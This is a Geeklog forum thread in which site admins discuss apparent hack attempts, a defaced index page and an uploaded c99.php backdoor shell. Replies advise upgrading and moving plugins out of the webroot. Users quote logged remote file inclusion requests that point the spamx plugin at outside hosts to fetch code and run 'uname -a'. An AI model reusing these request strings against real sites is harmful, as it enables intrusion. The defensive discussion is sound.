Welcome to Geeklog, Anonymous Saturday, December 21 2024 @ 07:49 am EST
Geeklog Forums
A way to tell if you've been hacked?
HI All,
I don't suppose anyone knows of a way to tell if a geeklog install has been hacked?
Seems like someone keeps trying to hack through an IP from Mexico:
/geeklog/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://myfox.altervista.org/tool25.dat?&cmd=uname%20-a HTTP/1.1
Thanks in advance for any feedback.
Best,
john
Looking for cool stuff - www.cubicleamusements.com
Looking for cool stuff - www.cubicleamusements.com
16
13
Quote
Status: offline
jmucchiello
Forum User
Full Member
Registered: 08/29/05
Posts: 985
That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
12
17
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
bye, Dirk
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
bye, Dirk
12
12
Quote
Status: offline
andyofne
Forum User
Chatty
Registered: 08/31/02
Posts: 69
Quote by: jmucchiello
That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
And yet it actually worked on my site because I choose to be crafty with my installation method and I didn't follow the instructions very well.
15
11
Quote
Status: offline
HerreVermeer
Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
Quote by: Dirk
I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
I suppose by following the exact directions you mean:
Root
|-my website.host.com
| |-Admin
| | |-Plugins
| |
| |-Plugins
|
|-Geeklog
|-Plugins
I've been having problems too lately, my site was hacked (they replaced my index.php page which was now displaying a message by whoever hacked me) twice in the last three days, by two different hackers from as it seems totally different countries. I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.
I was running an old versionn of media gallery however (1.4.7) but upgraded to 1.5.0 today. Other than that I was running two other old plugins: filemgmt and chatterblog, which I have now completely deleted and uninstalled.
Other than having my index.php page replaced I found a file called c99.php, on two different locations somewhere in my public html folder, and my bad_behavior log is also showing some of the logs that John is Talking about:
"Reason: User-Agent beginning with 'libwww-perl' prohibited
GET /links/index.php?category=Geeklog/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://kampsite.com/test4? HTTP/1.0" and much more of these
Is there any security leak that's been going on, or am I not protecting my files right (I have set it up as said in the geeklog installation, but not for any of the plugins)? Other than a little more than basic geeklog installations and handlings I'm also still nothing more than a newbee. Is there any way to better protect hackers from undermining my website's security (from potential hackers than like to destroy more than just my index page?)
Thanks a lot,
Herre
Herre Vermeer
http://fotograaf.freestarthost.com
34
15
Quote
Status: offline
HerreVermeer
Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
Note that the last directory--plugins-- is actually under the geeklog directory. The spaces got deleted when I posted
Herre Vermeer
http://fotograaf.freestarthost.com
Herre Vermeer
http://fotograaf.freestarthost.com
17
10
Quote
Status: offline
jmucchiello
Forum User
Full Member
Registered: 08/29/05
Posts: 985
I found a file called c99.php
Delete it. It's a known backdoor. Google it and you will find just about every php project on the web has users asking what c99.php is.
14
15
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: HerreVermeer
[I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.[/p]
You should be running 1.4.0sr5-1, if you're still on a 1.4.0 version. In 1.4.0sr4, we had to remove the FCKeditor's file manager due to a security issue that let people upload files. Make sure you've really removed it.
Other than having my index.php page replaced I found a file called c99.php
That's probably a PHP shell they managed to upload.
As I already said above, the log entries are nothing to worry about if you've secured your installation.
bye, Dirk
13
15
Quote
Status: offline
HerreVermeer
Forum User
Newbie
Registered: 03/08/06
Posts: 6
Location:Netherlands
My bad, I've been running geeklog version 1.4.1 for a while instead of 1.4.0 like I posted before. 
About the c99.php file, I already got rid of them.
After the first time I got hacked I just found the first one. I didn't realize that there was a second one until I got hacked again, two days later.
I don't know for how long those files have been on my website, it might be that they have been there for a while. More important, this time I made sure that there are no more versions of the c99.php file present on my website. I haven't been hacked today... so my hopes are up.
Herre Vermeer
http://fotograaf.freestarthost.com
About the c99.php file, I already got rid of them.
After the first time I got hacked I just found the first one. I didn't realize that there was a second one until I got hacked again, two days later.
I don't know for how long those files have been on my website, it might be that they have been there for a while. More important, this time I made sure that there are no more versions of the c99.php file present on my website. I haven't been hacked today... so my hopes are up.
Herre Vermeer
http://fotograaf.freestarthost.com
13
10
Quote
All times are EST. The time is now 07:49 am.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content